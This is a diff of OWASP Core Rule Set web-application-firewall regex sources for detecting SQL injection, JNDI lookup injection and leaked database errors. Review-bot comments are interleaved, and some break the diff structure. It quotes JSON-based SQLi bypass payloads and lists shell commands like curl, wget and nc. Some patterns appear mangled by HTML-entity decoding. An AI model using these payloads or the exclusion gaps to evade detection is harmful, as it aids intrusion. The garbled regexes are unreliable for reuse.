+{{base64-urlencoded-charset}}
+
+##!=>
+
+{{dot}}ey{{base64-urlencoded-charset}}
+
+##!=>
+
+{{dot}}{{base64-urlencoded-charset}}
+
+##!$ $
diff --git a/regex-assembly/942440.ra b/regex-assembly/942440.ra
new file mode 100644
index 0000000000..4d790510a7
--- /dev/null
+++ b/regex-assembly/942440.ra
@@ -0,0 +1,10 @@
+##! Please refer to the documentation at
+##! https://coreruleset.org/docs/development/regex_assembly/.
+
+/\*!?
+\*/
+[';]--
+--\s
+--[^-]*?-
+[^&-]#.*?\s
+;?\x00
diff --git a/util/regexp-assemble/regexp-942470.data b/regex-assembly/942470.ra
similarity index 83%
rename from util/regexp-assemble/regexp-942470.data
rename to regex-assembly/942470.ra
index ad69d1adbe..e9f5f3b558 100644
--- a/util/regexp-assemble/regexp-942470.data
+++ b/regex-assembly/942470.ra
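Review bot: In 942440-chain1 the third segment `{{dot}}{{base64-urlencoded-charset}}` requires at least one character after the second dot because the define ends in `+`, so an unsigned JWT (`alg` of `none`), which ends in the separator dot followed by an empty signature, never satisfies this chain; the parent rule is not visible here, so depending on whether the chain is used to exempt JWT-shaped values from 942440 or to flag them, that is either a false positive or a gap on exactly the tokens an attacker is most likely to hand-craft. If any three-part token should be recognised, use `{{dot}}[a-zA-Z0-9_-]*` for the last segment. A `##!` note that the charset deliberately has no `=` (JWT segments are unpadded base64url, as far as I know) would also stop someone "fixing" it later.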
@@ -1,4 +1,10 @@
+##! Please refer to the documentation at
+##! https://coreruleset.org/docs/development/regex_assembly/.
+
+##!+ i
+
 autonomous_transaction
+current_user
 dba_users
 dbms_java
 nvarchar
diff --git a/util/regexp-assemble/regexp-942480.data b/regex-assembly/942480.ra
similarity index 83%
rename from util/regexp-assemble/regexp-942480.data
rename to regex-assembly/942480.ra
index b34a23adc5..77655c6e4b 100644
--- a/util/regexp-assemble/regexp-942480.data
+++ b/regex-assembly/942480.ra
@@ -1,3 +1,8 @@
+##! Please refer to the documentation at
+##! https://coreruleset.org/docs/development/regex_assembly/.
+
+##!+ i
+
 \bdbms_\w+\.\b
 \bdelete\b\W*?\bfrom\b
 \bgroup\b.*?\bby\b.{1,100}?\bhaving\b
@@ -6,6 +11,7 @@
 \binto\b\W*?\bdumpfile\b
 \binto\b\W*?\boutfile\b
 \bload\b\W*?\bdata\b.*?\binfile\b
+\boverlay\b\W*?\(.*?\b\W*?placing\b
 \bprint\b\W*?\@\@
 \bselect\b.{1,100}?\b.*?\bdump\b.*\bfrom\b
 \bselect\b.{1,100}?\bcount\b.{1,100}?\bfrom\b
diff --git a/regex-assembly/942500.ra b/regex-assembly/942500.ra
new file mode 100644
index 0000000000..99a142dcd9
--- /dev/null
+++ b/regex-assembly/942500.ra
@@ -0,0 +1,9 @@
+##! Please refer to the documentation at
+##! https://coreruleset.org/docs/development/regex_assembly/.
+
+##!> define comment-contents (?:[\w\s=_\-()]+)
+##!> define c-style-modifiers \s*?[!+]
+
+##!+ i
+
+/\*{{c-style-modifiers}}{{comment-contents}}?\*/
diff --git a/regex-assembly/942520.ra b/regex-assembly/942520.ra
new file mode 100644
index 0000000000..05ae95b3b0
--- /dev/null
+++ b/regex-assembly/942520.ra
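Review bot: The new 942480 line `\boverlay\b\W*?\(.*?\b\W*?placing\b` leaves the gap between the opening parenthesis and `placing` unbounded (`.*?`), whereas the neighbouring patterns in this file bound their gaps with `.{1,100}?`; on a long value that contains `overlay(` but no `placing`, the lazy run is extended to the end of the input for every candidate position before the line fails. The `\b\W*?` after `.*?` also adds nothing that `\bplacing\b` does not already require (`\W*?` matching zero characters is always an accepted path), so it only adds backtracking. Suggest `\boverlay\b\W*?\(.{1,100}?\bplacing\b`, or a `##!` comment explaining why the gap must stay unlimited.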
@@ -0,0 +1,18 @@
+##! Please refer to the documentation at
+##! https://coreruleset.org/docs/development/regex_assembly/.
+
+##!+ i
+
+
+##!^ [\"'`]\s*?
+
+##! All tests below are prefixed with [\"'`]\s*?
+
+is\s+not\b
+##! all sqlite not smth from https://www.sqlite.org/lang_expr.html
+not\s+(?:like|glob|between|null|in|regexp|match)\b
+##! sql operators
+[|&<>*\/%=^+-]
+##! common operators that can't be added to 942120.data
+(?:mod|div)\b
+sounds\s+like\b
diff --git a/regex-assembly/942521.ra b/regex-assembly/942521.ra
new file mode 100644
index 0000000000..de2ab19614
--- /dev/null
+++ b/regex-assembly/942521.ra
@@ -0,0 +1,10 @@
+##! Please refer to the documentation at
+##! https://coreruleset.org/docs/development/regex_assembly/.
+
+##!^ ^
+##!+ i
+
+##! Regex for detecting first word after an odd number of quotes
+[^']*?(?:'[^']*?'[^']*?)*?'\s*(\w+)\b
+[^\"]*?(?:\"[^\"]*?\"[^\"]*?)*?\"\s*(\w+)\b
+[^`]*?(?:`[^`]*?`[^`]*?)*?`\s*(\w+)\b
diff --git a/regex-assembly/942540.ra b/regex-assembly/942540.ra
new file mode 100644
index 0000000000..248fdfcc6b
--- /dev/null
+++ b/regex-assembly/942540.ra
@@ -0,0 +1,8 @@
+##! Please refer to the documentation at
+##! https://coreruleset.org/docs/development/regex_assembly/.
+
+##! These expressions look for an ending '; pattern, but won't match if the quotes
+##! are balanced.
+^[^']*'\s*;
+^[^"]*"\s*;
+^[^`]*`\s*;
diff --git a/regex-assembly/942550.ra b/regex-assembly/942550.ra
new file mode 100644
index 0000000000..bf65e63cfa
--- /dev/null
+++ b/regex-assembly/942550.ra
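Review bot: The comment `##! common operators that can't be added to 942120.data` still points at the old `util/regexp-assemble/*.data` naming that this very change retires in favour of `regex-assembly/*.ra`, so the cross-reference will not resolve for anyone who follows it; update it to `##! common operators that can't be added to 942120.ra` and, since the reason is not visible here, say why `mod`/`div` cannot live in 942120 (one clause is enough, e.g. the prefix 942120 applies). Everything else in 942520 is anchored by the `##!^ [\"'`]\s*?` prefix, which the `##! All tests below are prefixed with` line documents well.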
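Review bot: The 942540 header says the patterns "won't match if the quotes are balanced", but `^[^']*'\s*;` can only ever consider the first quote in the input (the `[^']*` run cannot step over a quote), so the real rule is "the first quote is followed by `;`" irrespective of how many quotes follow: `x'; select 'y'` has balanced quotes and still matches, while `'abc';` does not. Reword the comment to `##! These expressions match a quote that is immediately followed by ';' (modulo whitespace), but only when that quote is the first one in the input; later quotes are not examined.` so the behaviour is not misread as quote counting.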
@@ -0,0 +1,30 @@
+##! Please refer to the documentation at
+##! https://coreruleset.org/docs/development/regex_assembly/.
+
+##! Referring to https://claroty.com/team82/research/js-on-security-off-abusing-json-based-sql-to-bypass-waf
+##! this rule tries to match the following payloads:
+##!
+##! PostgreSQL: '{"b":2}'::jsonb <@ '{"a":1, "b":2}'::jsonb
+##! PostgreSQL: '{"b":2}'::jsonb @> '{"a":1, "b":2}'::jsonb
+##! PostgreSQL: '{"b":2}'::jsonb @ '{"a":1, "b":2}'::jsonb
+##! PostgreSQL: '{"b":2}'::jsonb < '{"a":1, "b":2}'::jsonb
+##! PostgreSQL: '{"b":2}'::jsonb > '{"a":1, "b":2}'::jsonb
+##! SQLite: '{"a":2,"c":[4,5,{"f":7}]}' -> '$.c[2].f' = 7
+##! SQLite: '{"a":2,"c":[4,5,{"f":7}]}' <- '$.c[2].f' = 7
+##! SQLite: '{"a":2,"c":[4,5,{"f":7}]}' < '$.c[2].f' = 7
+##! SQLite: '{"a":2,"c":[4,5,{"f":7}]}' > '$.c[2].f' = 7
+##! MySQL: JSON_EXTRACT('{"id": 14, "name": "Aztalan"}', '$.name') = 'Aztalan'
+
+##!> define quotes [\"'`]
+##!> define operators (?:@>|<@|\?|\?\||\?&|#>|#>>|->>|<|>|->|<-)
+##!> define json_ending_brackets [\]\}]
+##!> define json_starting_brackets [\[\{]
+
+##!> assemble
+ ##! https://regex101.com/r/mzG5Fg/1
+ {{quotes}}{{json_starting_brackets}}.*{{json_ending_brackets}}{{quotes}}.*(::.*jsonb?)?.*{{operators}}
+ {{operators}}{{quotes}}{{json_starting_brackets}}.*{{json_ending_brackets}}{{quotes}}
+
+ ##! example: SELECT id FROM users WHERE id=JsoN_EXTraCT/**/(/**/' {"a":1} '/**/,/**/' $.a '/**/);
+ json_extract.*\(.*\)
+##!<
diff --git a/regex-assembly/942560.ra b/regex-assembly/942560.ra
new file mode 100644
index 0000000000..cb40cfa9e9
--- /dev/null
+++ b/regex-assembly/942560.ra
@@ -0,0 +1,8 @@
+##! Please refer to the documentation at
+##! https://coreruleset.org/docs/development/regex_assembly/.
+
+##!+ i
+
+1\.e,
+1\.e\(
+1\.e\)
diff --git a/regex-assembly/944150.ra b/regex-assembly/944150.ra
new file mode 100644
index 0000000000..523aebf5ae
--- /dev/null
+++ b/regex-assembly/944150.ra
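Review bot: The first 942550 alternative chains four unbounded greedy `.*` runs — `{{quotes}}{{json_starting_brackets}}.*{{json_ending_brackets}}{{quotes}}.*(::.*jsonb?)?.*{{operators}}` — and `json_extract.*\(.*\)` adds two more; on a long value that begins like JSON (`'{`) but contains none of the operators, the engine must try every way of splitting the input between the runs before giving up, which is polynomial-time backtracking in an expression that runs against every inspected argument. Bound the gaps the way 942480 does (`.{0,100}?`) or keep the runs from crossing quotes (`[^\"'`]*`), and make the cast group non-capturing and bounded, `(?:::.{0,20}?jsonb?)?`, since nothing in the file uses the capture. Also note `##!+ i` is missing from this file although the example comment relies on `JsoN_EXTraCT` being matched case-insensitively; confirm the parent rule supplies the flag.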
@@ -0,0 +1,23 @@
+##! Please refer to the documentation at
+##! https://coreruleset.org/docs/development/regex_assembly/.
+
+##! The following is an expansion of
+##! (?:\${[^}]{0,15}\${|\${(?:jndi|ctx))
+##! where every character also matches the equivalent named HTML entity.
+##! It is a workaround for the shortcomings of `htmlEntityDecode`, which
+##! handles numerical HTML entities well but only handles 5 named
+##! entities. The official list of named entities can be found here:
+##! https://html.spec.whatwg.org/multipage/named-characters.html.
+##!
+##! Note:
+##! - We don't match `}` or `}` because it would enable more
+##! evasions while also increasing the number of potential false positives.
+##! The risk of false negatives in this case is acceptable.
+##! - Omitting the terminating semi-colon can be used as an evasion with lenient
+##! parsers. We catch those by making the semi-colon optional.
+
+
+##!+ i
+
+(?:\$|$?)(?:\{|&(?:lbrace|lcub);?)[^}]{0,15}(?:\$|$?)(?:\{|&(?:lbrace|lcub);?)
+(?:\$|$?)(?:\{|&(?:lbrace|lcub);?)(?:jndi|ctx)
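Review bot: As rendered here the two expressions read `(?:\$|$?)`, and in PCRE `$?` is an optional end-of-subject assertion that always succeeds, which makes the dollar group effectively optional and turns the rule into "any `{`/`&lbrace;` ... `{` pair within 15 characters", far broader than the `\${...\${` expansion the header comment describes. The header states that every character is also matched as its named HTML entity, and the note shows `}` twice where two different spellings are evidently meant, so the checked-in file almost certainly contains `(?:\$|&dollar;?)` and `&rbrace;`/`&rcub;` and this rendering has HTML-decoded the entities; please confirm the committed bytes, and if the file really says `$?`, correct both lines to `(?:\$|&dollar;?)(?:\{|&(?:lbrace|lcub);?)...`. The same text appears in 944151 and 944152 and should be checked together.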
@@ -0,0 +1,22 @@
+##! Please refer to the documentation at
+##! https://coreruleset.org/docs/development/regex_assembly/.
+
+##! The following is an expansion of
+##! (?:\$\{[^}]*\$\{|\$\{(?:jndi|ctx))
+##! where every character also matches the equivalent named HTML entity.
+##! It is a workaround for the shortcomings of `htmlEntityDecode`, which
+##! handles numerical HTML entities well but only handles 5 named
+##! entities. The official list of named entities can be found here:
+##! https://html.spec.whatwg.org/multipage/named-characters.html.
+##!
+##! Note:
+##! - We don't match `}` or `}` because it would enable more
+##! evasions while also increasing the number of potential false positives.
+##! The risk of false negatives in this case is acceptable.
+##! - Omitting the terminating semi-colon can be used as an evasion with lenient
+##! parsers. We catch those by making the semi-colon optional.
+
+##!+ i
+
+(?:\$|$?)(?:\{|&(?:lbrace|lcub);?)[^}]*(?:\$|$?)(?:\{|&(?:lbrace|lcub);?)
+(?:\$|$?)(?:\{|&(?:lbrace|lcub);?)(?:jndi|ctx)
diff --git a/regex-assembly/944152.ra b/regex-assembly/944152.ra
new file mode 100644
index 0000000000..158445dec1
--- /dev/null
+++ b/regex-assembly/944152.ra
@@ -0,0 +1,18 @@
+##! Please refer to the documentation at
+##! https://coreruleset.org/docs/development/regex_assembly/.
+
+##! The following is an expansion of
+##! (?:\${[^}]{0,15}\${|\${(?:jndi|ctx))
+##! where every character also matches the equivalent named HTML entity.
+##! It is a workaround for the shortcomings of `htmlEntityDecode`, which
+##! handles numerical HTML entities well but only handles 5 named
+##! entities. The official list of named entities can be found here:
+##! https://html.spec.whatwg.org/multipage/named-characters.html.
+##!
+##! - Omitting the terminating semi-colon can be used as an evasion with lenient
+##! parsers. We catch those by making the semi-colon optional.
+
+
+##!+ i
+
+(?:\$|$?)(?:\{|&(?:lbrace|lcub);?)
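Review bot: The header comment of 944152.ra is copied from 944150.ra and claims the file is an expansion of `(?:\${[^}]{0,15}\${|\${(?:jndi|ctx))`, but the only pattern assembled is the bare `${` prefix with its named-entity spellings — there is no nested-lookup or `jndi`/`ctx` part. The comment should describe what is actually built, e.g. `##! The following is an expansion of \${ where every character also matches the equivalent named HTML entity.` Matching any `${` is deliberately much broader than 944150/944151; a one-line note saying so, and that the narrower nested/`jndi` forms live in those two files, would stop a later maintainer from "fixing" this one back to the copied expression.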
diff --git a/regex-assembly/951230.ra b/regex-assembly/951230.ra
new file mode 100644
index 0000000000..a96b6f9cc3
--- /dev/null
+++ b/regex-assembly/951230.ra
@@ -0,0 +1,22 @@
+##! Please refer to the documentation at
+##! https://coreruleset.org/docs/development/regex_assembly/.
+
+##!+ i
+
+supplied argument is not a valid MySQL
+Column count doesn't match value count at row
+mysql_fetch_array\(\)
+on MySQL result index
+You have an error in your SQL syntax;
+You have an error in your SQL syntax near
+MySQL server version for the right syntax to use
+\[MySQL\]\[ODBC
+Column count doesn't match
+Table '[^']+' doesn't exist
+SQL syntax.*MySQL
+##! Because of the bug in RE2 (golang), we cannot use {0,n} (a range started at 0), so it was replaced with (?:...{1,n})?
+Warning.{1,10}mysql_(?:[a-z_()]{1,26})?
+valid MySQL result
+MySqlClient\.
+ERROR [0-9]{4} \([a-z0-9]{5}\):
+XPATH syntax error:
diff --git a/regex-assembly/951240.ra b/regex-assembly/951240.ra
new file mode 100644
index 0000000000..7be6aa136d
--- /dev/null
+++ b/regex-assembly/951240.ra
@@ -0,0 +1,17 @@
+##! Please refer to the documentation at
+##! https://coreruleset.org/docs/development/regex_assembly/.
+
+##!+ i
+
+PostgreSQL query failed:
+pg_query\(\) \[:
+pg_exec\(\) \[:
+PostgreSQL.{1,20}ERROR
+##! Example match: Warning: pg_fetch_array(): 3 is not a valid PostgreSQL result resource
+Warning.{1,20}\bpg_.*
+valid PostgreSQL result
+Npgsql\.
+PG::[a-z]*Error
+Supplied argument is not a valid PostgreSQL .*? resource
+Unable to connect to PostgreSQL server
+invalid input syntax for integer
diff --git a/regex-assembly/exclude/unix-shell-fps-pl1-curated.ra b/regex-assembly/exclude/unix-shell-fps-pl1-curated.ra
new file mode 100644
index 0000000000..3950462851
--- /dev/null
+++ b/regex-assembly/exclude/unix-shell-fps-pl1-curated.ra
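Review bot: In 951230.ra the entry `Column count doesn't match` already matches everything `Column count doesn't match value count at row` matches, so the longer line is dead weight; keep one so the list has a single source of truth. `SQL syntax.*MySQL` runs an unbounded `.*` over the whole response body under the `i` flag; consistent with the file's own RE2 note, a bounded form such as `SQL syntax(?:.{1,200})?MySQL` would cap the backtracking without losing the real error text, which always puts the two phrases close together.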
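Review bot: `invalid input syntax for integer` in 951240.ra only matches the wording of older PostgreSQL releases; newer servers phrase this error as `invalid input syntax for type integer: "..."` (I believe the `type` word was added in PostgreSQL 12 — please verify), so a leaked error from a current server would slip past this line. `invalid input syntax for (?:type )?integer` covers both spellings. Since this is a response-leakage rule, consider whether the sibling types that produce the same message (`bigint`, `numeric`) should be in scope too; the current entry is integer-only.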
@@ -0,0 +1,21 @@
+##! Please refer to the documentation at
+##! https://coreruleset.org/docs/development/regex_assembly/.
+
+##! This list excludes command words that are prone to cause false
+##! positives from the following include files:
+##! - unix-shell-upto3.ra and
+##! - unix-shell-4andup.ra
+
+##! To reduce complexity, this file simply lists all possible
+##! variants of a word, so when a word would be changed from, e.g.,
+##! `awk@` to `awk~`, this list would not have to be updated.
+
+##! This list contains a subset of commands extracted from the file unix-shell-fps-pl1.ra
+##! It specifically includes commands for which false positive reports were received.
+
+more
+more@
+more~
+time
+time@
+time~
diff --git a/regex-assembly/exclude/unix-shell-fps-pl1.ra b/regex-assembly/exclude/unix-shell-fps-pl1.ra
new file mode 100644
index 0000000000..a38db68644
--- /dev/null
+++ b/regex-assembly/exclude/unix-shell-fps-pl1.ra
@@ -0,0 +1,820 @@ +##! Please refer to the documentation at +##! https://coreruleset.org/docs/development/regex_assembly/. + +##! This list excludes command words that are prone to cause false +##! positives from the following include files: +##! - unix-shell-upto3.ra and +##! - unix-shell-4andup.ra + +##! To reduce complexity, this file simply lists all possible +##! variants of a word, so when a word would be changed from, e.g., +##! `awk@` to `awk~`, this list would not have to be updated. + +##! To automatically add exclusions for English words from the sources, run the following: +##! NL=$'\n' +##! original="$(grep -vE '^[#$]' regex-assembly/exclude/unix-shell-fps-pl1.ra)" +##! upto3="$(grep -vE '^[#$]' regex-assembly/include/unix-shell-upto3.ra)" +##! rest="$(grep -vE '^[#$]' regex-assembly/include/unix-shell-4andup.ra)" +##! english_upto3="$(util/fp-finder/spell.sh -m -e regex-assembly/include/unix-shell-upto3.ra)" +##! # strip suffixes from words so that spell.sh works +##! english_rest="$(util/fp-finder/spell.sh -m -e -s '[@~]' regex-assembly/include/unix-shell-4andup.ra)" +##! result="" +##! function update_existing { +##! if [ -z "${1}" ]; then +##! return +##! fi +##! while read -r oword; do +##! found=0 +##! while read -r eword; do +##! if grep -qE "^${eword}[@~]?" <<<"${oword}"; then +##! result="${result}${eword}${NL}" +##! result="${result}${eword}@${NL}" +##! result="${result}${eword}~${NL}" +##! found=1 +##! break +##! fi +##! done <<<"${1}" +##! if [ ${found} -eq 0 ]; then +##! result="${result}${oword}${NL}" +##! fi +##! done <<<"${original}" +##! } +##! function add_new { +##! if [ -z "${1}" ]; then +##! return +##! fi +##! while read -r eword; do +##! if ! grep -qE "^${eword}[@~]?" <<<"${original}"; then +##! result="${result}${eword}${NL}" +##! result="${result}${eword}@${NL}" +##! result="${result}${eword}~${NL}" +##! fi +##! done <<<"${1}" +##! } +##! update_existing "${english_upto3}" +##! update_existing "${english_rest}" +##! 
add_new "${english_upto3}" +##! add_new "${english_rest}" + +##! body_start=$(grep -n -E -m 1 '^[^#$]' regex-assembly/exclude/unix-shell-fps-pl1.ra | cut -d: -f1) +##! ed -s regex-assembly/exclude/unix-shell-fps-pl1.ra <> regex-assembly/exclude/unix-shell-fps-pl1.ra + +GET +GET@ +GET~ +HEAD +HEAD@ +HEAD~ +POST +POST@ +POST~ +ab +ab@ +ab~ +adduser +agetty +alias +alias@ +alias~ +alpine +alpine@ +alpine~ +ansible-playbook +apt +apt-get +apt@ +aptitude +aptitude@ +aptitude~ +apt~ +ar +ar@ +arch +arch@ +arch~ +aria2c +arj +arp +arp@ +arp~ +ar~ +as +as@ +ascii-xfr +ascii85 +ash +ash@ +ash~ +aspell +as~ +at +at@ +atobm +at~ +awk +awk@ +aws +aws@ +basename +basename@ +basename~ +bash +bash@ +bash~ +batch +batch@ +batch~ +bpftrace +breaksw +bridge +bridge@ +bridge~ +bundler@ +busctl +byebug +c89 +c99 +cancel +cancel@ +cancel~ +capsh@ +cat +cat@ +cat~ +cc +cc@ +cc~ +certbot +chattr +chdir@ +check_by_ssh +check_cups +check_log +check_memory +check_raid +check_ssl_cert +check_statusfile +chflags +chmod +choom +chown +chroot +chroot@ +chroot~ +clang +clang@ +clang~ +cmp +cobc +column +column@ +column~ +comm +command +command@ +command~ +composer +composer@ +composer~ +compress +compress@ +compress~ +cowsay +cowthink +cp +cp@ +cpan +cpio +cpulimit +crash +crash@ +crash~ +crontab +csplit +csvtool +cupsfilter +curl +curl@ +curl~ +cut +cut@ +cut~ +dash +dash@ +dash~ +date +date@ +date~ +dd +dd@ +dd~ +dhclient +dialog +dialog@ +dialog~ +dig +dig@ +dig~ +dir +dir@ +dir~ +dmidecode +dmsetup +dnf +docker +docker@ +docker~ +done +done@ +done~ +dosbox +dpkg +du +du@ +dvips +easy_install +eb +eb@ +eb~ +echo +echo@ +echo~ +ed +ed@ +ed~ +efax +emacs +endif +endsw +env-update +eqn +es +es@ +esac +es~ +eval +eval@ +eval~ +ex +ex@ +exec +exec@ +exec~ +exiftool +expand +expand@ +expand~ +expect +expect@ +expect~ +export +export@ +export~ +expr +ex~ +facter +fc +fc@ +fetch +fetch@ +fetch~ +fi +fi@ +file +file@ +file~ +find +find@ +find~ +finger +finger@ +finger~ +fish +fish@ +fish~ +fi~ +flock 
+flock@ +flock~ +fmt +fold +fold@ +fold~ +foreach +fping +ftp +ftp@ +ftp~ +function +function@ +function~ +gawk +gawk@ +gawk~ +gcore +gdb +gem +gem@ +gem~ +genie +genie@ +genie~ +genisoimage +getfacl@ +ghc +ghci +gimp +gimp@ +gimp~ +ginsh +git +git@ +git~ +go +go@ +go~ +grc +group +group@ +group~ +gtester +hash +hash@ +hash~ +hd +hd@ +head +head@ +head~ +hexdump +highlight +highlight@ +highlight~ +history +history@ +history~ +hostid +hostname +hping3 +htdigest +htpasswd +iconv +id +id@ +id~ +ifconfig +iftop +install +install@ +install~ +ionice +ip +ip6tables +ip@ +ipconfig +iptables +ip~ +ispell +java +java@ +java~ +jexec +jjs +jobs +jobs@ +jobs~ +join +join@ +join~ +journalctl +jq +jrunscript +kill +kill@ +killall +kill~ +knife +knife@ +knife~ +ksshell +last +last@ +last~ +latex +latex@ +latex~ +ld +ld@ +ldconfig +ldd +ldd@ +less +less@ +less~ +links +links@ +links~ +ln +ln@ +local +local@ +local~ +locate +locate@ +locate~ +loginctl +logname +logsave +look +look@ +look~ +lp +lp@ +lp~ +lshw +ltrace +lua +lua@ +lualatex +luatex +lwp-dump +lwp-mirror +lwp-request +lynx +lynx@ +lynx~ +mail +mail@ +mailx@ +mail~ +make +make@ +make~ +man +man@ +man~ +mawk +mkdir@ +more +more@ +more~ +mosquitto +mount +mount@ +mount~ +msgattrib +msgcat +msgconv +msgfilter +msgmerge +msguniq +mtr +mutt +mutt@ +mutt~ +mv +mv@ +mv~ +mysql +nano@ +nasm +nawk +nc +nc@ +nc~ +neofetch +net +net@ +net~ +nice +nice@ +nice~ +nl +nl@ +nm +nm@ +nmap +nm~ +node +node@ +node~ +npm +npm@ +nroff +nsenter +nslookup +null +null@ +null~ +octave +octave@ +octave~ +od +od@ +od~ +openssl +openvpn +openvt +opkg +pacman@ +parted +parted@ +parted~ +passwd +paste +paste@ +paste~ +patch +patch@ +patch~ +pax +pax@ +pax~ +pdb +pdflatex +pdftex +perf +perlsh +perms +perms@ +perms~ +pf +pf@ +pg +pic +pic@ +pico@ +pic~ +pidstat +ping +ping@ +ping~ +pip +pip@ +pip~ +pkg +pkg_info +pkginfo +pr +pr@ +pry +pry@ +pry~ +pr~ +ps +ps@ +psftp +psql +ps~ +ptx +puppet +puppet@ +puppet~ +pushd +python +python@ +python~ +rake 
+rake@ +rake~ +raku +rar +rar@ +readelf +red +red@ +redcarpet@ +red~ +rename +rename@ +rename~ +repeat +repeat@ +repeat~ +replace +replace@ +replace~ +restic +rev +rev@ +rev~ +rlogin +rlwrap +rm +rm@ +route +route@ +route~ +rpm +rpm@ +rpmdb +rpmquery +rpmverify +rpm~ +ruby +ruby@ +ruby~ +run-mailcap +run-parts +rview +rvim +sash +sash@ +sash~ +sched +sched@ +sched~ +screen +screen@ +screen~ +script +script@ +script~ +self +self@ +self~ +service +service@ +service~ +set +set@ +setarch +setfacl@ +set~ +sg +sg@ +sg~ +shadow +shadow@ +shadow~ +shells +shells@ +shells~ +shuf +shutdown +shutdown@ +shutdown~ +sleep +sleep@ +sleep~ +slsh +smbclient +snap +snap@ +snap~ +soelim +sort +sort@ +sort~ +source +source@ +source~ +split +split@ +split~ +sqlite3 +ss +ss@ +ssh-keygen +ssh-keyscan +sshpass +ss~ +start-stop-daemon +stdbuf +strace +strings +strings@ +strings~ +su +su@ +systemctl +systemd-resolve +tac +tail +tail@ +tail~ +tar +tar@ +tar~ +task +task@ +taskset +task~ +tbl +tclsh +tcp +tcp@ +tcpdump +tcp~ +tee +tee@ +tee~ +tex +tex@ +tex~ +tftp +tic +tic@ +tic~ +time +time@ +timedatectl +time~ +tmux +top +top@ +top~ +touch +touch@ +touch~ +troff +tshark +ul +ul@ +ulimit@ +uncompress +uncompress@ +uncompress~ +unexpand +uniq +unlink +unlink@ +unlink~ +unset +unset@ +unset~ +unshare@ +unzip +unzip@ +unzip~ +up2date@ +update-alternatives +uudecode +uuencode +valgrind +vi +vi@ +view +view@ +view~ +vim +vim@ +vimdiff +vim~ +virsh +vi~ +volatility +volatility@ +volatility~ +w +w@ +wall +wall@ +wall~ +watch +watch@ +watch~ +wc +whiptail +whiptail@ +whiptail~ +who +who@ +whois +who~ +wireshark +wish +wish@ +wish~ +w~ +xelatex +xetex +xmodmap +xmore +xpad +xterm +xxd +yarn +yarn@ +yarn~ +yelp +yelp@ +yelp~ +yes +yes@ +yes~ +yum +zathura +zero +zero@ +zero~ +zip +zip@ +zip~ +zsoelim +zypper diff --git a/regex-assembly/exclude/unix-shell-fps-pl2-start-of-string.ra b/regex-assembly/exclude/unix-shell-fps-pl2-start-of-string.ra new file mode 100644 index 0000000000..257ac227ae 
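Review bot: The maintenance script embedded in this file's header has an anchoring bug in both `update_existing` and `add_new`: `grep -qE "^${eword}[@~]?"` is anchored only at the start, so an English word that is a prefix of a command (`as` vs `ascii85`, `at` vs `atobm`, `ar` vs `arch`/`arj`/`arp`) matches it, and in `update_existing` the real command entry is then replaced by the English word's three variants and silently dropped from the exclusion list — assuming spell.sh does emit such short words, which the `as`/`at`/`ar` triples in the list suggest. Changing both tests to `grep -qE "^${eword}[@~]?$"` fixes the anchoring; the word is also interpolated unescaped into an ERE, so names containing regex metacharacters (unix-shell-4andup.ra escapes `clang\+\+`) need a literal compare instead, e.g. `[[ "${oword%[@~]}" == "${eword}" ]]`. The final `ed -s … <> …` line appears garbled by the page rendering (presumably a heredoc), so I cannot review the write-back step. Since this file is what removes words from PL1 RCE detection, a one-line note naming the rule(s) that consume it — as unix-shell-fps-useragents.ra does — would help readers judge each removal.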
--- /dev/null
+++ b/regex-assembly/exclude/unix-shell-fps-pl2-start-of-string.ra
@@ -0,0 +1,19 @@
+##! Please refer to the documentation at
+##! https://coreruleset.org/docs/development/regex_assembly/.
+
+##! This list excludes command words that are prone to cause false
+##! positives from the following include files:
+##! - unix-shell-upto3.ra
+##! - unix-shell-4andup.ra
+
+##! To reduce complexity, this file simply lists all possible
+##! variants of a word, so when a word would be changed from, e.g.,
+##! `awk@` to `awk~`, this list would not have to be updated.
+##! See also unix-shell-fps-pl1.ra.
+
+as
+as@
+as~
+at
+at@
+at~
diff --git a/regex-assembly/exclude/unix-shell-fps-pl2.ra b/regex-assembly/exclude/unix-shell-fps-pl2.ra
new file mode 100644
index 0000000000..d55b11dd7e
--- /dev/null
+++ b/regex-assembly/exclude/unix-shell-fps-pl2.ra
@@ -0,0 +1,43 @@
+##! Please refer to the documentation at
+##! https://coreruleset.org/docs/development/regex_assembly/.
+
+##! This list excludes command words that are prone to cause false
+##! positives from the following include files:
+##! - unix-shell-upto3.ra
+##! - unix-shell-4andup.ra
+
+##! To reduce complexity, this file simply lists all possible
+##! variants of a word, so when a word would be changed from, e.g.,
+##! `awk@` to `awk~`, this list would not have to be updated.
+##! See also unix-shell-fps-pl1.ra.
+
+aptitude
+aptitude@
+aptitude~
+dnf
+dnf@
+dnf~
+more
+more@
+more~
+pacman
+pacman@
+pacman~
+ps
+ps@
+ps~
+time
+time@
+time~
+up2date
+up2date@
+up2date~
+vi
+vi@
+vi~
+who
+who@
+who~
+w
+w@
+w~
diff --git a/regex-assembly/exclude/unix-shell-fps-useragents.ra b/regex-assembly/exclude/unix-shell-fps-useragents.ra
new file mode 100644
index 0000000000..9cbd3f5541
--- /dev/null
+++ b/regex-assembly/exclude/unix-shell-fps-useragents.ra
@@ -0,0 +1,47 @@
+##! Please refer to the documentation at
+##! https://coreruleset.org/docs/development/regex_assembly/.
+
+##! This list excludes command words that are prone to cause false
+##! positives from the following include files:
+##!
+##! - unix-shell-upto3.ra
+##! - unix-shell-4andup.ra
+##! - unix-shell-pl3.ra
+
+##! This list is managed manually and contains known user-agents causing false positives
+##! in rules checking for RCE in User-Agent and Referer request header.
+
+##! To reduce complexity, this file simply lists all possible
+##! variants of a word, so when a word would be changed from, e.g.,
+##! `curl@` to `curl~`, this list would not have to be updated.
+##! See also unix-shell-fps-pl1.ra.
+
+# CPanel client (https://cpanel.net): Cpanel-HTTP-Client/1.0
+cpan
+cpan@
+cpan~
+# curl (https://curl.se): curl/8.1.2
+curl
+curl@
+curl~
+# Links browser (https://en.wikipedia.org/wiki/Links_(web_browser)): Links (2.3pre1; Linux 2.6.38-8-generic x86_64; 170x48)
+links
+links@
+links~
+# Requests (https://docs.python-requests.org/en/latest/index.html): python-requests/2.31.0
+# urllib (https://docs.python.org/3/library/urllib.html): Python-urllib/3.9
+python
+python@
+python~
+# Snapchat URL Preview Service (https://developers.snap.com/robots): Snap URL Preview Service; bot; snapchat; https://developers.snap.com/robots
+snap
+snap@
+snap~
+# w3m browser (https://en.wikipedia.org/wiki/W3m): w3m/0.5.1
+w3m
+w3m@
+w3m~
+# wget (https://www.gnu.org/software/wget/): wget
+wget
+wget@
+wget~
diff --git a/regex-assembly/exclude/windows-commands-fps.ra b/regex-assembly/exclude/windows-commands-fps.ra
new file mode 100644
